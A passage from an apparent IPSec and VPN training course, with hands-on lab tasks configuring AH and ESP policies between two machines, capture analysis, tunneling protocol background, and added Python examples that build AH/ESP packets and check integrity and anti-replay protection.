18. Switch to the Authentication Methods tab.
19. Click Edit.
20. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
21. Click OK three times to close the Policy Properties.
22. Close the console without saving settings.
AH and ESP IPSec Session Analysis
You have just gone through the steps of configuring IPSec on both Student_P and
Student_Q. In the next task, you will initiate a communication between the two
hosts, and analyze the communication in Network Monitor.
The initial communication will be an attempt at using FTP. As with the
1_REQUEST_AH(md5)_only policy, this transaction is also successful between
Student_P and Student_Q because Student_Q's policy is designed to request, not
demand, IPSec. If a remote machine trying to communicate with Student_Q is
not IPSec-aware, has no policy assigned, or (as here, where Student_P is still
assigned the 1_RESPOND_AH(md5)_only policy) has no security method in
common with Student_Q, then Student_Q will fall back to regular, insecure IP.
The brief delay occurs because Student_Q is trying to establish an IPSec
communication with Student_P. Once the connection is made, the second
computer will be configured to respond to the first properly.
During the session analysis, try to note the differences from the earlier captures,
those resulting from the AH_only policy. Here, you are not able to see any of the
TCP flags, connection setup, three-way handshake completion, or data transfer;
in fact, past the ESP header you will see nothing but encrypted data. The
protocol is listed simply as ESP. If you check the details within the IP header,
IP points to AH (IP protocol ID 51, 0x33) and AH points to ESP (IP protocol
ID 50, 0x32). After the IP header come AH and then ESP. Only the ESP SPI and
sequence number remain readable; without the negotiated session key, no one but
these two endpoints can decrypt packets destined for them. Keep in mind that
this protection is only as strong as the algorithms chosen: single DES uses a
56-bit key and can be brute-forced, so in production prefer 3DES, and give ESP
its own integrity algorithm rather than leaving it at <None>.
TASK 6D-3
Configuring and Analyzing an IPSec Session Using AH and ESP
Note: Perform step 1 through step 2 only if you are designated as Student_Q.
1. Open your ipsec.mmc.msc console. Right-click the 5_REQUEST_AH(md5)+ESP(des) policy and choose Assign. Close the console.
2. Start Network Monitor, and start a capture.
Note: Perform step 3 through step 8 only if you are designated as Student_P.
3. At the command prompt, again enter ftp IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q.
4. Log on as anonymous with no password.
5. Enter dir to see a list of files hosted on the ftp site.
6. Exit the ftp session.
Note: As you assign and unassign policies, you might need to issue the command gpupdate /force to initialize those policies right away.
7. Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_AH(md5)+ESP(des) policy, and choose Assign.
8. Open a command prompt and enter the following command: gpupdate /force (this will ensure that your newly assigned policy will start right away).
Note: Perform step 9 through step 11 only if you are designated as Student_Q.
9. In Network Monitor, stop and view the capture.
10. Observe the session between the two hosts. Note that encryption is not used
and that commands are visible in clear text.
11. Start a new capture (save the previous capture if you like).
Note: Perform step 12 through step 15 on Student_P.
12. At the command prompt, again enter ftp IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q.
13. Log on as anonymous with no password.
14. Enter dir to see a list of files hosted on the ftp site.
15. Exit the ftp session.
Note: Perform step 16 through step 19 only if you are designated as Student_Q.
16. In Network Monitor, stop and view the capture.
17. Search the packets, and try to look for the name of the text file in response to the dir (LIST) command.
18. Observe that AH ensures integrity and ESP ensures confidentiality of communication between the two machines.
19. Close Network Monitor. You can save your capture to a file if you like.
Note: Perform the following step only if you are designated as Student_P.
20. Open your ipsec.mmc.msc console, unassign the 5_RESPOND_AH(md5)+ESP(des) policy, and close the console.
Configuring All the Options
Now, let's step up the requirements for IPSec. Let's say you were paranoid and wanted to use all the features set to their highest security settings. You will configure an IPSec policy on Student_Q that will use the SHA-1 algorithm to ensure integrity and 3DES to ensure confidentiality. You will then configure Student_Q to demand IPSec of other computers. To do so, you will use a Require policy instead of a Request policy. Finally, on Student_P, you will implement a corresponding Respond policy and establish communications with Student_Q.
Someone may bring up the question, "Hey, why would you use the integrity algorithm twice?" At this point, we'll leave the answer as a smug "Because we can!" Actually, there is a simpler explanation.
Most books on IPSec recommend using AH to ensure the integrity of the entire packet and ESP just for confidentiality of the payload. Most books on IPSec also simply say that ESP "...can also be used for integrity." Let's look at this a little more carefully.
The AH's function is to sign the entire packet, including the IP header. However, there are certain fields in the IP header that have to be excluded because they are designed to change. One example of this is when traversing a routed environment: the 8-bit TTL field will decrement by 1 at each hop. The values contained within these fields cannot be signed, as the received value would not match the value at origin.
The ESP's function is to encrypt and/or sign everything but the IP header. In Transport Mode, using ESP's signing functionality might be considered redundant when AH is around to do the job, especially when AH can sign even the IP headers (mostly).
It's when IPSec is implemented in Tunnel Mode, as with a VPN solution, that ESP's signing functionality has some meaning over and above that of AH. In Tunnel Mode, there are two IP headers in each packet. The outer IP header is the one used by the tunnel endpoints to communicate with each other. Encapsulated within this as payload data is the IP header, IP protocol, and the actual data of the two hosts communicating end-to-end via the tunnel. Therefore, when the tunnel endpoints use ESP's integrity algorithm, the internal IP headers are treated as data and will be completely signed.
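As an added example (not code from the course), the following Python builds a Transport Mode IP | AH | ESP packet with constructed addresses, SPIs, key and a ciphertext stand-in, walks the header chain the way the Network Monitor analysis above does (IP Protocol 51 for AH, AH Next Header 50 for ESP), and shows the point made here about mutable fields: the AH check still passes after a router decrements the TTL, but fails when an immutable field such as the destination address is changed.

```python
"""Walk an IP -> AH -> ESP header chain and check the AH integrity value.

Added example, not code from the course. The packet is constructed: the
10.0.0.x addresses, SPIs, key and the ESP body (a stand-in for DES-CBC
ciphertext) are made-up lab values. The AH ICV is HMAC-MD5-96 over the packet
with the mutable IPv4 fields (ToS, flags/fragment offset, TTL, checksum) and
the ICV slot itself zeroed, so a TTL decrement in transit does not break it.
"""
import hashlib
import hmac
import struct

IPPROTO_AH = 51   # 0x33: the IPv4 Protocol field value seen in the capture
IPPROTO_ESP = 50  # 0x32: the AH Next Header value seen in the capture
IP_HDR = 20       # IPv4 header without options
AH_FIXED = 12     # next header, payload length, reserved, SPI, sequence number
ICV_LEN = 12      # HMAC-MD5-96 and HMAC-SHA1-96 both truncate to 96 bits

KEY = b"constructed-lab-key"  # stands in for the key IKE derives from the preshared key
# Constructed stand-in for an 8-byte DES-CBC IV followed by encrypted, padded FTP data.
ESP_BODY = bytes.fromhex("0f1e2d3c4b5a6978" "9a7c51e3b02f4dd16c8e13a5f7094b2e")


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum over the 20-byte header; caller zeroes the checksum field."""
    total = sum(struct.unpack("!10H", header[:IP_HDR]))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def with_checksum(header: bytes) -> bytes:
    """Return the header with its checksum recomputed, as every router does."""
    zeroed = header[:10] + b"\x00\x00" + header[12:IP_HDR]
    return zeroed[:10] + struct.pack("!H", ipv4_checksum(zeroed)) + zeroed[12:]

def build_ipv4(src: str, dst: str, proto: int, payload_len: int, ttl: int = 128) -> bytes:
    """Minimal IPv4 header: version/IHL, ToS, total length, ID, flags, TTL, protocol."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HDR + payload_len, 0x1234, 0x4000,
                      ttl, proto, 0, bytes(map(int, src.split("."))),
                      bytes(map(int, dst.split("."))))
    return with_checksum(hdr)

def ah_icv(packet: bytes, key: bytes) -> bytes:
    """HMAC-MD5-96 over the packet with mutable fields and the ICV slot zeroed."""
    buf = bytearray(packet)
    buf[1] = 0                    # ToS: may be rewritten by QoS devices
    buf[6:8] = b"\x00\x00"        # flags / fragment offset
    buf[8] = 0                    # TTL: decremented at every hop
    buf[10:12] = b"\x00\x00"      # header checksum: recomputed at every hop
    icv_at = IP_HDR + AH_FIXED
    buf[icv_at:icv_at + ICV_LEN] = bytes(ICV_LEN)
    return hmac.new(key, bytes(buf), hashlib.md5).digest()[:ICV_LEN]

def build_ah_esp_packet(src, dst, key, ah_spi, esp_spi, seq, esp_body) -> bytes:
    """Transport mode: IP | AH | ESP(SPI, seq, opaque body); the AH ICV is filled last."""
    esp = struct.pack("!II", esp_spi, seq) + esp_body
    ah = struct.pack("!BBHII", IPPROTO_ESP, (AH_FIXED + ICV_LEN) // 4 - 2, 0,
                     ah_spi, seq) + bytes(ICV_LEN)
    pkt = build_ipv4(src, dst, IPPROTO_AH, len(ah) + len(esp)) + ah + esp
    icv_at = IP_HDR + AH_FIXED
    return pkt[:icv_at] + ah_icv(pkt, key) + pkt[icv_at + ICV_LEN:]

def walk_headers(packet: bytes) -> dict:
    """Follow Protocol / Next Header the way you would in Network Monitor."""
    proto, off, chain, info = packet[9], (packet[0] & 0x0F) * 4, ["IP"], {}
    info["ip_protocol_field"] = proto
    if proto == IPPROTO_AH:
        nxt, plen, _, spi, seq = struct.unpack_from("!BBHII", packet, off)
        ah_len = (plen + 2) * 4
        info["ah"] = {"spi": spi, "seq": seq, "icv": packet[off + AH_FIXED:off + ah_len].hex()}
        chain.append("AH")
        proto, off = nxt, off + ah_len
    if proto == IPPROTO_ESP:
        spi, seq = struct.unpack_from("!II", packet, off)
        # Everything after SPI and sequence number is ciphertext to an observer.
        info["esp"] = {"spi": spi, "seq": seq, "opaque_bytes": len(packet) - off - 8}
        chain.append("ESP")
    else:
        chain.append(str(proto))  # e.g. 6 for TCP under an AH-only policy
    info["chain"] = " -> ".join(chain)
    return info

def verify_ah(packet: bytes, key: bytes) -> bool:
    """Receiver side: recompute over the zeroed packet and compare in constant time."""
    icv_at = (packet[0] & 0x0F) * 4 + AH_FIXED
    return hmac.compare_digest(packet[icv_at:icv_at + ICV_LEN], ah_icv(packet, key))

def in_transit(packet: bytes, hops: int = 1, new_dst: str = None) -> bytes:
    """Routers decrement TTL and recompute the checksum (allowed); rewriting the
    destination address changes an immutable field, which AH is meant to detect."""
    buf = bytearray(packet)
    buf[8] -= hops
    if new_dst:
        buf[16:20] = bytes(map(int, new_dst.split(".")))
    return with_checksum(bytes(buf[:IP_HDR])) + bytes(buf[IP_HDR:])
```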
By the way, before you get carried away with IPSec, it is also recommended that you read Bruce Schneier's excellent critique of IPSec. You can find it at his company's website, www.counterpane.com.
TASK 6D-4
Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy
Note: Perform this task only if you are designated as Student_Q. Student_P is
advised to follow along.
1. Create another IP Security Policy. Click Next.
2. For the IP Security Policy Name, type 7_REQUIRE_AH(sha)+ESP(sha+3des) and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, and click
Add.
7. On the IP Filter List tab, select the All IP Traffic radio button.
8. Switch to the Filter Action tab.
9. Select the Require Security radio button.
10. Click Edit.
11. Leave the radio button selected for Negotiate Security.
12. If necessary, remove all but one security method.
13. Select the remaining method, and click Edit.
14. Under Security Method, click the Settings button found under Custom.
15. Verify that AH is checked.
16. Select the integrity algorithm as SHA1.
17. Verify that ESP is checked.
18. Select ESP's integrity algorithm as SHA1.
19. For Encryption Algorithm, select 3DES.
20. Under the Session Key settings, verify that the two boxes for generating
new keys for both time and size are unchecked.
21. Click OK three times to return to the Rule Properties.
22. Switch to the Authentication Methods tab.
23. Click Edit.
24. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
25. Click OK, click Close, then click OK to exit the Policy Properties.
Configuring the AH-and-ESP IPSec Response Policy
In order for the two hosts to communicate, they must have compatible IPSec policies implemented. By now, you are familiar with the procedure, so the following task should be rather straightforward.
TASK 6D-5
Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy
Note: Perform this task only if you are designated as Student_P. Student_Q is
advised to follow along.
1. Create another IP Security Policy. Click Next.
2. For the IP Security Policy Name, type 7_RESPOND_AH(sha)+ESP(sha+3des) and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, check
<Dynamic> Default Response, and click Edit.
7. Remove all but one security method.
8. Select the remaining method, and click Edit.
9. Under Security Method, click the Settings button found under Custom.
10. Verify that AH is checked.
11. Select the integrity algorithm as SHA1.
12. Verify that ESP is checked.
13. Select ESP's integrity algorithm as SHA1.
14. For Encryption Algorithm, select 3DES.
15. Under Session Key settings, verify that the two boxes for generating new
keys for both time and size are unchecked.
16. Click OK twice to return to the Rule Properties.
17. Switch to the Authentication Methods tab.
18. Click Edit.
19. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
20. Click OK twice, and then click Close to exit the Policy Properties.
21. Close the console without saving settings.
Implementing the Full IPSec Session
So far, you have configured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the SHA-1 algorithm and ESP by using both the SHA-1 and 3DES algorithms; Student_Q also will respond only by using these algorithms. Now, let's see what happens when Student_P follows Student_Q's lead.
When you perform the final analysis in Network Monitor, keep the following in mind: if you were to perform a hex-to-hex comparison of the two captures, you would see that, due to the additional overhead imposed by the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy over the 6_REQUIRE_AH(md5)+ESP(des) policy, the number of bits is greater. In fact, had you transferred large files between the two machines, the number of frames would also have been greater.
TASK 6D-6
Implementing and Analyzing an AH(sha) and ESP(sha+3des) IPSec Session
Note: Perform step 1 through step 2 only if you are designated as Student_Q.
1. Open your ipsec.mmc.msc console. Assign the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy. When you assign this policy, the previously assigned policy is automatically unassigned.
2. Start Network Monitor, and start a capture.
Note: Perform step 3 through step 7 only if you are designated as Student_P.
3. Open your ipsec.mmc.msc console. Assign the 7_RESPOND_AH(sha)+ESP(sha+3des) policy.
4. At the command prompt, enter ftp IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q.
5. Log on as anonymous with no password.
6. Enter dir to see a list of files hosted on the ftp site.
7. Exit the ftp session.
Note: Perform the rest of this task only if you are designated as Student_Q.
8. In Network Monitor, stop and view the capture.
9. Observe that once ISAKMP establishes the encryption method, all data is
encrypted with ESP.
10. Identify any differences with respect to the negotiation process, encryption, or integrity algorithms.
11. Where does the packet identify that AH is in use?
In the IP header.
What is the Protocol ID assigned to AH?
51 (0x33)
Where does the AH information define the use of ESP?
In the AH Next Header.
What is the Protocol ID assigned to ESP?
50 (0x32)
12. Close Network Monitor. You can save your capture to a file if you like.
13. Unassign all IPSec policies on all machines.
Topic 6E
VPN Fundamentals
A Virtual Private Network (VPN) provides a private tunnel through a public cloud (such as the Internet). A VPN enables a group of two or more computer systems to communicate over the Internet or any other public network. VPNs can exist between an individual machine and a private network (client-to-server) or a remote LAN (like a branch office) and a private, enterprise network (server-to-server). Secure VPNs make use of tunneling and security protocols to maintain the privacy of data transactions over the Internet.
A VPN is virtual, as opposed to a real private network. The idea is to make a private network that provides a secure tunnel for the exchange of data between two or more parties. If this were done over a real private network, the dedicated lines/bandwidth and service would make it cost prohibitive. But when this idea of a secure tunnel is implemented over a public network such as the Internet, the costs as well as the bandwidth are spread among many users, thus creating a Virtual Private Network.
LAN: (Local Area Network) A computer communication system limited to no more than a few miles and using high-speed connections (2 to 100 megabits per second). A short-haul communication system that connects ADP devices in a building or group of buildings within a few square kilometers, including workstations, front-end processors, controllers, and servers.
VPN Business Drivers
VPNs are popular today for a number of reasons, including:
Mature standards, protocols, and technology.
Significant cost savings.
Reduction in network complexity, resulting in lower network operation costs.
Increased security and encryption capabilities.
The Need for Remote Access
Remote access is a business requirement today, required for both communication and interaction. To determine whether or not a VPN is a good answer to your company's needs for remote connectivity, consider your specific technical requirements, along with the pros and cons of VPN use.
Some advantages to using VPNs include:
The ability to securely connect high-speed remote users over broadband technology, including cable modems and DSL lines, that was not possible before the advent of VPNs. VPNs will work with any last-mile technology as long as IP is running over the connection.
No administrative headaches for managing direct access telephone lines (dedicated leased lines), ISDN, T1, or PRI lines used for data, or for the RAS equipment (modems or other network access servers). Terminating the phone calls creates potential cost savings, especially if many of your remote users are located outside your local calling area.
Some disadvantages include:
Potentially lower bandwidth available to remote users over a VPN connection, as compared to a direct dial-in line.
Inconsistent remote access performance due to changes in Internet connectivity. To counteract this, you can have your users choose ISPs that have higher levels of service, perhaps the same ISP from which you purchase your corporate Internet connection, to keep the majority of your traffic on the same backbone.
No entrance into the network if the Internet connection is broken. Some administrators choose to leave a limited amount of dial-in access for emergency access.
The Need for Extranets
Most VPNs can be designed to work as an extranet. But not all extranets are VPNs. Although there are several different meanings attributed to the term, it commonly refers to a type of network that gives outside users, such as customers, clients, and business associates, access to data residing on a corporation's network. Users access the data through a web browser over the Internet and typically need to enter a user name and password before access to the data is granted. Depending on the level of security needed, a company could choose to use an extranet approach or a customized approach that combines password protection of network servers with third-party authentication systems.
A VPN can be used in a similar manner, but a VPN typically has much higher security associated with it. Specifically, a VPN typically requires the establishment of a tunnel into the corporate network and the encryption of data passed between the user's PC and corporate servers.
VPN Types
Even though the number of solutions is steadily increasing, VPNs fall under three main types:
Hardware-based VPNs, for use in gateway-to-gateway configuration.
Firewall-based VPNs.
Software-based VPN applications, for use in client-to-client configuration.
Most hardware-based VPN systems are encrypting routers. Dedicated hardware VPN products offer better performance, security, reliability, and scalability than software-based solutions running on conventional servers and operating systems. They offer better performance and are more scalable because they are custom-built to perform essential tasks, such as encryption and decryption, as quickly as possible, often by having dedicated chips to carry out these functions. Their security is better because they are not vulnerable to weaknesses in an underlying operating system or hard disks that can fail or run out of space. The best hardware VPN packages offer software-only clients for remote installation, and incorporate some of the access control features more traditionally managed by firewalls or other perimeter security devices. However, they may not be as flexible as software-based VPNs.
Firewall-based VPNs take advantage of the firewall's security mechanisms, including controlling access to the internal network. They also perform Network Address Translation (NAT), satisfy requirements for strong authentication, and serve up real-time alarms along with audit logs. Most commercial firewalls also harden the host operating system kernel by stripping out unnecessary services, such as default accounts for guest users, which are a clear vulnerability for exploitation, thus providing additional security for the VPN server. Operating system protection is a major plus, since very few VPN application vendors supply guidance on operating system security. Performance may be a concern, especially if the firewall is already configured; however, some firewall vendors offer hardware-based encryption processors to minimize the impact of VPN management on the system.
Software-based VPNs are ideal in situations where both user and destination endpoints of the VPN are not controlled by the same organization, and when different firewalls and routers are implemented within the same organization. At the moment, stand-alone VPNs offer the most flexibility in how network traffic is managed. Many software-based products allow traffic to be tunneled based on IP address or protocol, unlike hardware-based products, which generally tunnel all traffic they handle regardless of protocol. Tunneling specific traffic types is advantageous in situations where remote sites may see a mix of traffic: some that needs transport over a VPN to access data and some that does not, as in simple web surfing. In situations where performance requirements are not heavy, software-based VPNs may be the best choice.
A disadvantage might be that software-based systems are generally harder to manage than encrypting routers. They require familiarity with the host operating system and the application itself, and appropriate security mechanisms must be in place. Also, most software-based VPN packages require changes to routing tables and network addressing schemes.
As the VPN market evolves, the distinctions between VPN architectures are becoming less clearly defined. Some hardware vendors have added software clients to their product offerings, and extended their server capabilities to include some of the security features more traditionally offered by software- or firewall-based VPNs. A few stand-alone products have added support for hardware-based encryptors to improve their performance. For all types of VPNs, further implementation of the proposed IP Security Protocol (IPSec) is making interoperability easier with different VPN products by softening the lines of distinction between them.
VPN Elements
The critical elements of a VPN connection are described in the following table.
VPN server: Accepts connections from VPN clients and can also provide VPN connections between routers.
VPN client: Initiates the VPN connection that ends up at the VPN server. A VPN client can be an end-user system, such as Windows 2000 or Windows XP, or it can be a router that gets a router-to-router connection. A VPN client can be a Point-to-Point Tunneling Protocol (PPTP) client or a Layer 2 Tunneling Protocol (L2TP) client using IPSec.
Tunnel: The part of the connection where the data is encapsulated.
VPN connection: The part of the connection where the data is encrypted. The data must be both encrypted and encapsulated along the same part of the connection for the connection to be considered a secure VPN connection.
Tunneling protocols: The communication standard used to manage the tunnel and encapsulate the data. For example, Windows 2003 supports the PPTP and L2TP tunneling protocols.
Tunneled data: Sent across the private point-to-point link.
Transit network: The IP internetwork (for example, the Internet) that connects the VPN client with the VPN server.
Each of the different types of VPN configurations can be enabled by using some combination of the following technology components:
Dedicated VPN gateways
IPSec-enabled routers and firewalls
VPN client software
IPSec-enabled operating systems, such as Windows 2003
A number of security applications combine VPN and rewall functionality into a
single box. This is very useful for branch offices communicating with central
office gateways.
Tunneling and Security Protocols
Tunneling is a technique where a data packet is transferred inside the frame or packet of another protocol. Therefore, the infrastructure of one network is used to travel to another. A tunnel can be thought of as a session pipe. A VPN client connects to a VPN server through a tunnel using a tunneling protocol. The logical path along which the encapsulated packet is routed is called the tunnel. Tunneling describes the entire process:
Encapsulation of the data packet at the source.
Transmission of the data packet through the tunnel.
Un-encapsulation of the data packet at the destination.
In a VPN connection, encrypted data is sent through the tunnel. Both the tunnel
client and the tunnel server must use the same tunneling protocols. The major
tunneling protocols for VPNs are:
Point-to-Point Tunneling Protocol (PPTP)
Layer 2 Tunneling Protocol (L2TP)
IP Security Protocol (IPSec)
Tunneling mechanisms differ in terms of:
What is done to the data for encryption and authentication.
The OSI layer at which they operate.
The headers that describe the data transmission and authentication.
TASK 6E-1
Defining Tunneling Protocols
1. Define the three major tunneling protocols for VPNs:
Point-to-Point Tunneling Protocol (PPTP), Layer 2 Tunneling Protocol (L2TP), and IP Security Protocol (IPSec)
Topic 6F
Tunneling Protocols
Earlier in the course, you studied the IPSec protocol intensively, by working with various IPSec policy settings and testing their validity. The policies, however, were tested only in Transport Mode. When IPSec is used to secure VPN communication, it is used in Tunnel Mode.
IP Security Protocol (IPSec) is an evolving security protocol from the Internet Engineering Task Force (IETF) that provides authentication and encryption over the Internet. Normal IPv4 packets consist of headers and payload, both of which contain information of value to an attacker. The header contains source and destination IP addresses, which are required for routing, but may be spoofed or altered in what are known as man-in-the-middle attacks. The payload consists of information that may be confidential to a particular organization.
OSI: (Open Systems Interconnection) A set of internationally accepted and openly developed standards that meet the needs of network resource administration and integrated network components.
The two prime functions of IPSec are to ensure data security and data integrity.
Security is achieved through data encryption techniques, and integrity through a
combination of techniques that authenticate the data sender. IPSec is a set of
industry standards for cryptography-based protection services and protocols.
As mentioned in the previous topic, the major tunneling protocols for VPNs are
PPTP, L2TP, and IPSec. Each of the three VPN protocols provides different levels
of security and ease of deployment. The standardization process has made the
Layer 2 Tunneling Protocol (L2TP) and IPSec the protocols of choice. PPTP is
widely used for remote access connections, primarily because of its integration in
the Microsoft operating systems.
PPTP, L2TP, and Cisco's Layer 2 Forwarding Protocol (L2F) are all designed to work at Layer 2 of the OSI model. IPSec is the only protocol engineered to work at Layer 3 of the OSI model. IPSec is fast emerging as the protocol of choice to build the best VPN system because it supports:
Strong security
Encryption
Authentication
Key management
When dealing with VPNs in a multi-protocol non-IP network environment, PPTP or L2TP may be a better choice. Both PPTP and L2TP are strictly tunneling protocols. Since IPSec was designed for the IP protocol, it has wide industry support and is expected to eventually become the standard for VPNs on the Internet.
Other tunneling protocols include:
Secure Shell (SSH)
Socks v5
These offer Application layer tunnels, as well as various implementations of tunnels, such as cascaded tunnels, nested tunnels, or end-to-end tunnels. The SSH protocol is a widely used Application layer tunneling protocol that uses a public key cryptographic system to ensure security. SSH is freely available as a direct result of OpenSSH initiatives. The SSH protocol suite offers a secure replacement for Telnet, rlogin, FTP, and other programs, in addition to tunneling capabilities. Socks v5 offers an Application layer VPN by providing desktop-to-server authentication and encryption. While both SSH and Socks v5 are exceptional application (session)-tunneling protocols, they are not widely deployed in strategic enterprise VPN solutions.
Point-to-Point Tunneling Protocol (PPTP)
The PPTP Forum developed the Point-to-Point Tunneling Protocol (PPTP) specification. This forum included Ascend Communications, 3Com/Primary Access, ECI Telematics, U.S. Robotics, and Microsoft. PPTP has fast become the most widely used protocol for creating dial-in remote access VPNs. A key reason for the success of PPTP for dial-in remote access has been support for the protocol by Microsoft. Microsoft supports PPTP on the NT Server platform version 4.0 and above and includes a free PPTP client in the desktop operating system. The Microsoft version of PPTP is its own version of the IETF PPTP protocol, and it is the Microsoft version that is the de facto standard for PPTP deployments. Most vendor products use Microsoft's version of the protocol.
cryptography: The art or science concerning the principles, means, and methods for rendering plain text unintelligible and for converting encrypted messages into intelligible form.
SSH: (Secure Shell) A completely encrypted shell connection between two machines protected by a super long pass-phrase.
Working at Layer 2 of the OSI model, PPTP encapsulates PPP packets using a modified version of Generic Routing Encapsulation (GRE), which gives PPTP the capability to handle any supported network layer protocol such as IP, IPX, and NetBEUI.
While PPTP is best suited for remote access VPNs, there are some security issues related to it. These issues relate to vulnerabilities associated with the Challenge/Response Authentication Protocol (Microsoft CHAP), as well as the RC4-based encryption protocol (MPPE). Even though there have been security updates and enhancements by Microsoft, it is still recommended that Microsoft's PPTP protocol not be used in VPN systems where there is a strong need to protect sensitive data. PPTP may be an appropriate solution to deploy in smaller organizations that may only need a limited regional VPN, supporting small numbers of mobile users.
Layer 2 Tunneling Protocol (L2TP)
Layer 2 Tunneling Protocol (L2TP), defined in RFC 2661, is a protocol for tunneling PPP sessions across a variety of network protocols such as IP, Frame Relay, or ATM. The IETF working group joined the PPTP group's efforts with Cisco's Layer 2 Forwarding Protocol (L2F) initiatives to develop L2TP. L2TP is the successor to PPTP and L2F.
L2TP was specifically designed for client-to-gateway and gateway-to-gateway connections with broad tunneling and security interoperability. L2TP has wide vendor support because it addresses the IPSec shortcomings of client-to-gateway and gateway-to-gateway connections. L2TP tunnels appear as IP packets, so IPSec Transport Mode provides authenticity, integrity, and confidentiality security controls.
L2TP tunneled-in IP, using UDP port 1701, is used as the VPN tunneling protocol
over the Internet for tunnel maintenance. Compressed or encrypted PPP frames
encapsulated in L2TP also use UDP to transmit tunneled data.
IPSec
IPSec in Tunnel Mode secures TCP/IP-based protocols using Layer 2 Tunneling Protocol (L2TP). Three main components form the building blocks of the IPSec protocol suite:
Authentication Header (AH): Provides authentication, integrity, and anti-replay protection for both the IP header and the data payload. It does not provide confidentiality.
Encapsulating Security Payload (ESP): Provides confidentiality and/or authentication. Data is encrypted before it is transmitted.
Security Association (SA): Defines the security policy to be used in managing the secure communication between two nodes.
Keep in mind that you can use IPSec itself as the tunneling protocol, or you can use L2TP to create the tunnel and let IPSec provide data encryption. L2TP does not provide its own encryption service; it uses IPSec's ESP protocol to encrypt and authenticate the entire UDP datagram, thereby protecting it from compromise by unauthorized users. You can create L2TP tunnels without encryption, but this is technically not a VPN because the data is not protected.
Authentication Header (AH)
IPSec provides mechanisms to protect both header and payload data. The IPSec Authentication Header (AH) provides a mechanism for data integrity and data origin authentication for IP packets using the hashing algorithms Hash-based Message Authentication Code (HMAC) with MD5 or HMAC with Secure Hash Algorithm 1 (SHA-1). Use of the IP AH is indicated with the value 51 in the IPv4 Protocol field or IPv6 Next Header field in the IP packet header.
AH digitally signs the outbound packet, both data payload and headers, with a hash value appended to the packet, verifying the identity of the source and destination machines and the integrity of the payload.
Encapsulating Security Payload (ESP)
The IPSec Encapsulating Security Payload (ESP) guarantees the integrity and confidentiality of the data in the original message by combining a secure hash and encryption of either the original payload by itself, or a combination of both the headers and payload of the original packet. As in AH, ESP uses HMAC with MD5 or SHA-1 authentication; privacy is provided using DES-CBC encryption. Placing a value of 50 in the IPv4 Protocol field or IPv6 Next Header field in the IP packet header indicates use of the IP ESP format. Both AH and ESP provide sequence numbers in each packet; this prevents a replay attack.
Security Association (SA) and Key Exchange
Before two parties can exchange secure data that is authenticated and encrypted,
those parties need to determine:
Which algorithms will be used for the session.
How the key exchange will take place.
How often keys will need to change.
AH: (Authentication Header) A field that immediately follows the IP header in an IP datagram and provides authentication and integrity checking for the datagram.
ESP: (Encapsulating Security Payload) A mechanism to provide confidentiality and integrity protection to IP datagrams.
Then, the two parties need to actually exchange the keys. These values are packaged together in a Security Association (SA) to facilitate secure communication between the two systems. Authentication and confidentiality using AH or ESP use SAs. A primary role of IPSec key exchange is to establish and maintain SAs. SAs are logical, uniquely defined, uni-directional (one-way) connections between two communicating IP endpoints that provide security services to the traffic they carry using either AH or ESP procedures. The endpoints of the tunnel can be an IP host or an IP security gateway, which is a VPN-enabled network device. Providing security to the more typical scenario of two-way (bi-directional) communication between two endpoints requires the establishment of two SAs (one in each direction).
Two types of SAs are defined in IPSec, regardless of whether AH or ESP is used for the session. A Transport Mode SA is a security association between two hosts that provides the authentication and/or encryption service to the higher layer protocol. Only IPSec hosts support this mode of operation. A Tunnel Mode SA is a security association applied to an IP tunnel. In this mode, an outer IP header specifies the IPSec destination and an encapsulated IP header specifies the destination for the IP packet. Both hosts and security gateways support this mode of operation and it is considered the more secure of the two.
IPSec is controlled specifically by a security policy of both sender and receiver and one or more Security Associations (SA) negotiated between them. An SA between the sending and receiving parties provides access control based on the distribution of cryptographic keys and traffic management relative to the AH and ESP security protocols. The SA is either one one-way relationship or two one-way relationships in complementary directions. A Security Parameter Index (SPI) uniquely distinguishes each SA from other SAs. The IPSec security policy consists of a filter list and associated actions.
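The two ideas above, an SA identified by its SPI and a per-packet sequence number that defeats replay, shown as an added example that is not part of the course text: the receiver parses the ESP header, finds the SA for the SPI, and runs the sliding anti-replay window. The SA database, the packets and the window width (RFC 4303's minimum of 64) are assumptions made here.

```python
"""Added example (not from the course text): parse the ESP header, look up the
Security Association (SA) by its SPI, and enforce the per-SA anti-replay window
that the sequence number exists for.  Packets and the SA database are
constructed here; the window size follows the RFC 4303 minimum of 64.
"""
import struct

ESP_PROTOCOL = 50      # IPv4 Protocol / IPv6 Next Header value for ESP
AH_PROTOCOL = 51       # the value used for AH
WINDOW_SIZE = 64       # RFC 4303 minimum anti-replay window width


class SecurityAssociation:
    """One uni-directional inbound SA, identified by its SPI."""

    def __init__(self, spi, algorithms):
        self.spi = spi
        self.algorithms = algorithms   # e.g. "HMAC-SHA1-96 / DES-CBC" (label only)
        self.highest_seq = 0           # right edge of the sliding window
        self.bitmap = 0                # bit i set => (highest_seq - i) already seen

    def check_and_update(self, seq):
        """Classify a sequence number as 'new', 'replay' or 'stale'.

        'new' packets are recorded; a 'replay' is a duplicate inside the
        window; 'stale' is older than the window and cannot be checked, so
        it is rejected as well.
        """
        if seq == 0:
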